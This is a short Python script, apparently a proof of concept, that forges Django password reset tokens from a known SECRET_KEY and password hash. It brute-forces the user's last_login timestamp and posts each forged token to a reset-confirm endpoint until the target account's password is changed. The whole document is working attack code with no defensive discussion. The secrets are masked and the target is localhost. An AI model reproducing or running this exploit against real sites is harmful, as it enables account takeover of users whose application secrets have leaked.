exploit.py

# coding: utf8

# Demo of django reset token bruteforce exploit

from PasswordResetTokenGenerator import PasswordResetTokenGenerator
from django.utils.encoding import force_bytes, force_text
from django.utils.http import base36_to_int, int_to_base36, urlsafe_base64_encode, urlsafe_base64_decode
from datetime import date, datetime
import time
import requests


if __name__ == "__main__":

    HASHED_PASS = "pbkdf2_sha256$100000$**************************************************"
    SECRET_KEY  = '*************************************'
    HOME_URL = "localhost:8000"
    RESET_TOKEN_URL = "localhost:8000/account/password_reset_confirm/"
    PK          = 42


    client = requests.Session()
    client.get(HOME_URL)

    payload = {
        'csrfmiddlewaretoken': client.cookies['csrftoken'],
        'new_password1': 'michelmichel',
        'new_password2': 'michelmichel',
    }

    start_attack_timestamp = time.time()

    i = 0
    while True:
        print("{}/? : {} hours scanned".format(i, i / 3600))

        class User:
            def __init__(self):
                self.password = HASHED_PASS
                self.pk       = PK
                self.last_login = datetime.fromtimestamp(start_attack_timestamp - i)

        uid   = force_text(urlsafe_base64_encode(force_bytes(User().pk)))
        token = PasswordResetTokenGenerator(SECRET_KEY).make_token(User())
        url   = RESET_TOKEN_URL + "{}/{}/".format(uid, token)
        result = client.post(url, data=payload).text
        if not "Confirm" in result:  # If we're not on the "Confirm your new password .. " page
            print("Done : Password reset")
            break
        i += 1